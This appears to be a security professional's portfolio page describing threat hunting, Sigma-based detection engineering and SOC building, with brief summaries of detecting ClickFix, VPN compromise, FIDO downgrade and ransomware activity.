I find what automated tools miss, turn threat intelligence into high-fidelity detections, and build security operations from scratch. Currently engineering detection coverage across 1,300+ Sigma rules and custom detections at Secnap Network Security.
Proactive hypothesis-driven hunts across endpoint, cloud, and identity environments. I dig through raw telemetry to find what automated tools miss — from VPN compromises to FIDO downgrade attacks.
Designing and tuning high-fidelity detection rules mapped to MITRE ATT&CK. From Sigma rules to custom LimaCharlie detections, I build coverage that catches real threats without drowning the SOC in noise.
SOC platforms, criticality scoring, workflow systems, threat timelines — I've orchestrated the build of entire security operations infrastructure in a lean startup environment where nothing existed before.
Detected a ClickFix attack through callstack analysis — explorer.exe with shell32.dll launching untrusted processes. Caught it before NetSupport RAT could establish persistence. Built a detection rule to catch this pattern across all customer environments.
Discovered a threat actor with a 2-month undetected VPN compromise attempting Active Directory brute force. Developed a recurring hunt to address the detection gap and prevent similar compromises going forward.
Identified FIDO downgrade attacks in Azure Entra ID, malicious LNK files pointing to C2 servers, and infostealers like Chihuahua Stealer during proactive hunts across customer environments.
Created ransomware detection rules using File I/O patterns in Windows kernel events through Fibratus and ETW providers. Built kernel-level visibility where traditional EDR had blind spots.